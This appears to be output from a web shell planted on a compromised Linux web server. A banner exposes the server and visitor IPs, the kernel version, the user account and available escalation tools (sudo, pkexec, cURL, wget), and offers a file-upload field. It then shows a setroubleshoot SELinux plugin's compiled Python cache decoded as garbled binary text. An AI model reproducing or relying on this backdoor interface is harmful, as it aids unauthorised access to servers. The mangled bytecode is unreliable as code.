Server IP : 184.154.167.98 / Your IP : 3.147.68.226 Web Server : Apache System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64 User : puertode ( 1767) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/share/setroubleshoot/plugins/__pycache__/ |
Upload File : |
3 nm�a_ � @ sD d dl Z e jddd�Zej Zd dlT d dlmZ G dd� de�ZdS ) � Nzsetroubleshoot-pluginsT)Zfallback)�*)�Pluginc @ sL e Zd Zed�Zed�ZdZdZed�Zed�Z ed�Z dd� Zd d � ZdS )�pluginz3 Your system may be seriously compromised! a� SELinux has prevented $SOURCE from modifying $TARGET. This denial indicates $SOURCE was trying to modify the selinux policy configuration. All applications that need this access should have already had policy written for them. If a compromised application tries to modify the SELinux policy this AVC will be generated. This is a serious issue. Your system may very well be compromised. z:Contact your security administrator and report this issue.� zUIf you do not think $SOURCE_BASE_PATH should try $ACCESS access on $TARGET_BASE_PATH.z]you may be under attack by a hacker, since confined applications should not need this access.c C s t j| t� d| _d S )NZred)r �__init__�__name__�level)�self� r �2/usr/share/setroubleshoot/plugins/selinuxpolicy.pyr 0 s zplugin.__init__c C sJ |j dg�s|j� rF|jdddddddd d ddd ddddg�rF| j� S d S )N�writeZselinux_config_tZdefault_context_tZfile_context_tZsemanage_store_tZsemanage_read_lock_tZsemanage_trans_lock_tZload_policy_exec_tZsetfiles_exec_tZcheckpolicy_exec_tZnewrole_exec_tZpolicy_src_tZrestorecond_exec_tZrun_init_exec_tZsetsebool_exec_tZsemanage_exec_tZselinux_var_lib_t)Zhas_any_access_inZopen_with_writeZmatches_target_typesZreport)r Zavcr r r �analyze4 s&